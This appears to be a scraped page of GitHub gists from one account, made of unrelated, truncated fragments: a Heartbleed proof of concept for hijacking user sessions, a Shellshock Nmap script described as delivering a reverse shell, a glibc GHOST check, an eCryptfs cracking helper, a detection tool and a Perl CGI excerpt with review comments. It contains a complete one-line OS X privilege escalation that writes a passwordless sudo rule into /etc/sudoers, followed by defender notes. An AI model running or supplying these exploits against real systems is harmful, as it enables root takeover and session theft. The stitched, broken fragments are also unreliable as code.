
sh1n0b1 / heartbleed-altered.py
Created April 9, 2014 09:44
Using Heartbleed PoC for Hijacking User Sessions En Masse
#!/usr/bin/python
# Connects to servers vulnerable to CVE-2014-0160 and looks for cookies, specifically user sessions.
# Michael Davis (mike.philip.davis@gmail.com)
# Based almost entirely on the quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)
# The author disclaims copyright to this source code.
# https://www.michael-p-davis.com/using-heartbleed-for-hijacking-user-sessions/
sh1n0b1 / a04c152139d85507cac88fcc4aaf9ca9
Last active August 29, 2015 14:05
a04c152139d85507cac88fcc4aaf9ca9
$sesshash{'ip'} = '68.227.245.145';
$sesshash{'user'} = 'admin';
#!/usr/bin/perl -w
use CGI;
use Digest::MD5 qw(md5_hex);
# NOTE(review): nothing below is declared with `my`, so every variable is a package global
# (the script does not `use strict` in this excerpt).
$cgi = new CGI;
# Session files are kept under /tmp, a directory that is normally shared and world-writable;
# confirm that whatever is stored there is not trusted for authentication decisions.
$SESSDIR = "/tmp/";
# $sessfile is taken verbatim from the client-supplied "diagsess" cookie. How it is joined with
# $SESSDIR, and whether it is restricted to a safe character set before any file access, is not
# visible in this excerpt -- NOTE(review): verify in the rest of the script.
$sessfile = $cgi->cookie("diagsess");
# Request parameters, also attacker-controlled; their use is outside this excerpt.
$arg0 = $cgi->param("arg");
$action = $cgi->param("action");
sh1n0b1 / http-vuln-cve-2014-6271.nse
Created October 6, 2014 09:15
NSE script for Shellshock vulnerability, CVE-2014-6271
local http = require "http"
local shortport = require "shortport"
local stdnse = require "stdnse"
local vulns = require "vulns"
description = [[
NSE script that delivers you a reverse shell using CVE-2014-6271.
Usage: ./nmap -p80 --script http-vuln-cve-2014-6271.nse
--script-args http-vuln-cve-2014-6271.remoteIp=<your-ip>,http-vuln-cve-2014-6271.remotePort=<your-port>,http-vuln-cve-2014-6271.uri=/cgi-bin/status
<ip> -d
#!/bin/python
import sys
import socket
import time
import struct
# Require at least a <host> argument; the usage text lists the port as optional.
if len(sys.argv) < 2:
    usage = "Tripwire VERT CVE-2014-0224 Detection Tool (OpenSSL Change Cipher Spec Injection) v0.3 by Tripwire VERT (@TripwireVERT)\nUsage: %s <host> [port=443]"
    print usage % sys.argv[0]
    quit()
<html>
<title>PHP Source Analyzer by Delicon</title>
<head>
<script language="JavaScript">
function mouseDown_Action(c_id) {
var obj = document.getElementById(c_id);
if (obj.style.visibility == 'hidden') {
obj.style.visibility = 'visible';
obj.style.position = 'static';
} else {
sh1n0b1 / CVE-2015-0235.c
Created January 28, 2015 06:34
CVE-2015-0235
#include <netdb.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <gnu/libc-version.h>
#define CANARY "in_the_coal_mine"
struct {
char buffer[1024];
char canary[sizeof(CANARY)];
sh1n0b1 / escalate.sh
Created July 25, 2015 00:13
OS X 10.10 DYLD_PRINT_TO_FILE Local Privilege Escalation Vulnerability
# It should work for OS X 10.10-10.10.4
# What the line below relies on (inferred from the command itself -- NOTE(review)): the DYLD_PRINT_TO_FILE
# environment variable is honoured when the setuid `newgrp` binary starts, so the file it opens for
# logging (/etc/sudoers here) is written with root privileges; the echoed sudoers rule is sent to fd 3,
# presumably the descriptor the linker opened for that log. `sudo -s` then uses the new NOPASSWD rule.
# Defender notes: the fix is the vendor update for the releases named above. Detection: file-integrity
# monitoring on /etc/sudoers, alerting on "NOPASSWD:ALL" entries for non-admin accounts, and auditing
# DYLD_* variables present in the environment of setuid processes.
echo 'echo "$(whoami) ALL=(ALL) NOPASSWD:ALL" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp; sudo -s
#!/usr/bin/env python
# Helper script for cracking eCryptfs.
#
# Refer to "ecryptfs-utils_104.orig.tar.gz" in case of doubt.
#
# This software is Copyright (c) 2014 Dhiru Kholia <dhiru.kholia at gmail.com> and
# Copyright (c) 2015, NagraVision <sylvain.pelissier at nagra.com>
# and it is hereby released to the general public under the following terms:
#
sh1n0b1 / dump.pl
Created September 17, 2015 22:30
pcap SSL packet dump for Wireshark to decrypt - https://supportforums.cisco.com/blog/154046
#!/usr/bin/perl
#Author: Michal Garcarz @ cisco.com
#Date: 15.01.2013
use Net::Frame::Simple;
use Net::Frame::Dump::Offline;
use Net::Frame::Layer::TCP;
use Net::Frame::Layer;
use Net::Frame::Layer::IPv4;